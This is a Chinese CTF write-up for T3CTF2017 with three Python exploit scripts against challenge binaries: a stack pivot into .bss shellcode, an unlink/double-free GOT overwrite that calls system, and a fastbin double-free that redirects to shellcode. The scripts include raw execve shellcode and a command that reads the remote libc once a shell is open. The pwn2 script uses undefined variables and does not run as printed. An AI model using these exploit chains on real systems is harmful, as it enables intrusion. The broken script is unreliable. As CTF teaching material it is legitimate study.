【pwn】T3CTF2017 堆溢出以及 return to dl resolve

pwn1,没什么好说的,看了下checksec,NX没开,栈迁移以后直接执行bss上的shellcode就可以了。

from roputils import *
import pwn
# pwn1 exploit (Python 2: str/bytes are mixed freely). Per the author's note
# above, NX is off, so the idea is a stack pivot into .bss followed by the
# shellcode stored there. All addresses are hard-coded for the challenge binary.
p = pwn.remote("127.0.0.1",12346)
addr_bss = 0x0804A080  # .bss address used below; this name itself is never read
# First message: a 4-byte pointer to bss+4, then the shellcode bytes as given by
# the author, padded with 'a' to exactly 0x1f4 bytes. The prose says this
# buffer is what ends up in .bss.
buf = p32(0x0804A080+4)+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
buf += (0x1f4-len(buf))*'a'
p.send(buf)
# Second message: 504 filler bytes and then bss+4 again -- presumably the
# overwritten control value that performs the pivot described in the prose
# (the 504 offset comes from the author's analysis, which is not shown here).
buf = 'a'*504
buf += p32(0x0804A080+4)
p.sendline(buf)
data = p.recvuntil("\n")  # consume one line of output; its content is unused
# With a shell up, dump the remote libc -- the note on pwn2 below says that
# binary's libc is obtained from pwn1 this way.
p.sendline("cat /lib/x86_64-linux-gnu/libc.so.6")
p.interactive()

pwn2的libc可以从pwn1中获取。非常经典的double free教学题。可以参考 http://www.tuicool.com/articles/yquU732 (double free浅析,乌云的文章)

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2017-04-07 19:09:17
# @Author : WinterSun (511683586@qq.com)
# @Link : https://Winter3un.github.io/
from pwn import *
context(log_level="debug")  # pwntools: log every byte sent and received
DEBUG = 0  # 0 -> talk to the remote service; 1 -> run ./pwn2 locally
if DEBUG:
    p = process('./pwn2')
    # gdb.attach(p,"b*0x0400A6D\nc")
else:
    p = remote("120.27.248.138",12345)
def sd(data):
    """Send ``data`` followed by a newline to the target (pwntools wrapper)."""
    p.sendline(data)
def ru(data):
    """Read from the target until ``data`` is seen and return everything read."""
    return p.recvuntil(data)
def add(index,length,data):
    """Drive menu action 1: create note ``index`` of ``length`` bytes holding ``data``.

    Each prompt fragment is awaited before the matching answer is sent.
    """
    dialogue = (
        ("the action:", "1"),
        ("note index:\n", str(index)),
        (" of the new note:\n", str(length)),
        ("ts of note:", data),
    )
    for prompt, answer in dialogue:
        ru(prompt)
        sd(answer)
def dele(index):
    """Drive menu action 2: delete note ``index``."""
    dialogue = (
        ("the action:", "2"),
        ("ter the note index:", str(index)),
    )
    for prompt, answer in dialogue:
        ru(prompt)
        sd(answer)
def edit(index,length,data):
    """Drive menu action 3: overwrite note ``index`` with ``length`` bytes of ``data``.

    The length is sent as typed by the caller; the service is trusted to
    honour it (the exploit relies on that below).
    """
    dialogue = (
        ("the action:", "3"),
        (" note index:", str(index)),
        (" new note:", str(length)),
        ("of note:\n", data),
    )
    for prompt, answer in dialogue:
        ru(prompt)
        sd(answer)
def show(index):
    """Drive menu action 4: print note ``index`` (the caller reads the output)."""
    dialogue = (
        ("the action:", "4"),
        (" note index:", str(index)),
    )
    for prompt, answer in dialogue:
        ru(prompt)
        sd(answer)
def edit_anyaddr(addr,data):
    """Write ``data`` to ``addr`` using two edits (author's helper).

    Presumably note 0's pointer already refers into the note table after the
    unlink performed in the main script, so the first edit rewrites the table
    (slot 1 -> 0x6020a8, slot 2 -> 0, slot 3 -> ``addr`` -- layout inferred
    from the payload, confirm against the binary) and the second edit then
    writes ``data`` through note 2.
    """
    payload = '\x00'*0x18+p64(0x6020a8)+p64(0)+p64(addr)
    edit(0,len(payload),payload)
    edit(2,len(data),data)
# pwn2 main script (Python 2). The author frames this as the classic
# double-free / unlink teaching problem; see the article linked above. All
# addresses are hard-coded for the challenge binary and for the libc dumped
# in pwn1.

# Four 512-byte notes; note 3 holds the string that is freed at the very end.
add(0,512,"aaa")
add(1,512,"aaa")
add(2,512,"aaa")
add(3,512,"/bin/sh\x00")
# Forged chunk header followed by fd/bk. 0x6020C0 is addressed again below as
# the note table (0x6020C0+0x20 == slot 4 if entries are 8 bytes, matching
# show(4)); the -0x18/-0x10 offsets are the unlink pattern from the linked
# write-up.
head = p64(0)+p64(1+512)
fd = p64(0x6020C0 - 0x18)
bk = p64(0x6020C0 - 0x10)
payload = head+fd+bk
payload += "a"*(512-len(payload))
payload += p64(512)+p64(512+0x10)  # presumably prev_size/size of the next chunk
payload += "a"*(600-len(payload))
edit(0,600,payload)  # 600 > 512: writes past note 0 into what follows it
dele(1)  # freeing the neighbour is what triggers the unlink (per the prose)
free_got = 0x602018  # author's name for the GOT slot written near the end
# NOTE(review): `puts_got` and `puts_addr` are never defined anywhere in this
# listing, so as pasted these lines raise NameError; looks like an editing
# slip in the write-up. Left as the author published it.
edit_anyaddr(0x6020C0+0x20,p64(puts_got))
show(4)
free_addr = u64(ru("\n")[:-1].ljust(8,"\x00"))  # leaked 6-8 bytes -> qword
print "free_addr="+hex(free_addr)
offset = 0x83940-0x45390  # distance between two libc symbols, specific to the author's libc
system_addr = puts_addr - offset
edit_anyaddr(0x602018,p64(system_addr))  # replace the free@GOT entry with system_addr
dele(3)  # free(note 3) now calls system on "/bin/sh"
p.interactive()
#flag{038a6d27a716d1e1472b1eded07c385d}

pwn3是fastbin double free attack的考察点,要利用这个攻击我们需要伪造出一个fake fastbin出来,所幸题目给予了所有的攻击条件。

可参考 https://github.com/shellphish/how2heap/blob/master/fastbin_dup_into_stack.c

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2017-04-07 19:09:17
# @Author : WinterSun (511683586@qq.com)
# @Link : https://Winter3un.github.io/
import roputils
from pwn import *
context(log_level="debug")  # pwntools: log every byte sent and received
DEBUG = 1  # only the local path is live; the remote branch is commented out
if DEBUG:
    p = process('./pwn3')
    # gdb.attach(p,"b*0x4009da\nc")
# else:
# p = remote()
def sd(data):
    """Send ``data`` followed by a newline to the target (pwntools wrapper)."""
    p.sendline(data)
def ru(data):
    """Read from the target until ``data`` is seen and return everything read."""
    return p.recvuntil(data)
def welcome(data):
    """Answer the initial name prompt with ``data``."""
    ru("name\n")
    sd(data)
def add(index,length,data):
    """Menu action 1: store ``data`` as paper ``index`` with the given ``length``.

    Waits for the menu footer before choosing the action; ``add2`` is the
    variant that skips that wait.
    """
    dialogue = (
        ("delete paper\n", "1"),
        ("o store(0-9):", str(index)),
        ("ill enter:", str(length)),
        ("our content:", data),
    )
    for prompt, answer in dialogue:
        ru(prompt)
        sd(answer)
def add2(index,length,data):
    """Same as ``add`` but sends the action immediately, without awaiting the menu."""
    sd("1")
    dialogue = (
        ("o store(0-9):", str(index)),
        ("ill enter:", str(length)),
        ("our content:", data),
    )
    for prompt, answer in dialogue:
        ru(prompt)
        sd(answer)
def dele(index):
    """Menu action 2: delete paper ``index``."""
    dialogue = (
        ("delete paper\n", "2"),
        ("index(0-9):", str(index)),
    )
    for prompt, answer in dialogue:
        ru(prompt)
        sd(answer)
def setsize(size):
    """Menu action 3: submit ``size`` at the "number:" prompt."""
    dialogue = (
        ("delete paper\n", "3"),
        ("number:", str(size)),
    )
    for prompt, answer in dialogue:
        ru(prompt)
        sd(answer)
def leak_stack():
    """Send two 0x30-byte fillers and decode an address echoed back.

    The second reply line is sliced at [0x30:0x36] -- six bytes right after
    the filler -- and zero-padded to a little-endian qword. The caller treats
    the result as a stack address; why those six bytes are a pointer depends
    on the binary (presumably a missing terminator after the 0x30-byte
    buffer set by ``setsize(0x30)`` -- not shown here).
    """
    ru("delete paper\n")
    sd("a"*(0x30))
    ru("\n")
    sd("a"*(0x30))
    return u64(ru("\n")[0x30:0x30+6].ljust(8,"\x00"))
# pwn3 main script (Python 2). The author's note above describes this as a
# fastbin double-free ("fastbin_dup_into_stack" in how2heap); constants are
# for the local ./pwn3 binary (DEBUG = 1).

# Shellcode bytes exactly as given by the author.
buf = ""
buf += "\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68"
buf += "\x00\x53\x48\x89\xe7\x68\x2d\x63\x00\x00\x48\x89\xe6"
buf += "\x52\xe8\x08\x00\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68"
buf += "\x00\x56\x57\x48\x89\xe6\x0f\x05"
shellcode = buf
shellcode_addr = 0x6020c0  # presumably where the "name" from welcome() is stored -- confirm
welcome(shellcode)
setsize(0x30)  # presumably sets the buffer size leak_stack() relies on
stack_addr = leak_stack()
print "stack_addr="+hex(stack_addr)
# Two absolute addresses apparently copied from a debugging session; only
# their difference matters. target_addr is the fake-chunk location, 8 bytes
# below that point.
offset = 0x7ffcfca53d30 - 0x00007ffcfca53c20
target_addr = stack_addr-offset-0x8
print "offset = "+hex(offset)
print "target_addr = "+hex(target_addr)
# Free the same paper twice with another free in between (author: "a-b-a"),
# the double-free pattern from the linked how2heap example.
add2(0,0x20,"aaa")
add(1,0x20,"aaa")
dele(0)
dele(1)
dele(0)#a-b-a
# Re-allocate in the same order: the data of the first allocation lands where
# the still-listed chunk's fd pointer sits (per how2heap), so the fourth
# allocation is served from target_addr.
add(0,0x20,p64(target_addr))
add(1,0x20,"aaa")
add(2,0x20,p64(target_addr))
payload = "a"*0x10+p64(shellcode_addr)
add(3,0x20,payload)  # writes shellcode_addr at target_addr+0x10
sd("4")  # menu action 4 -- presumably the exit path that uses the planted value
p.interactive()
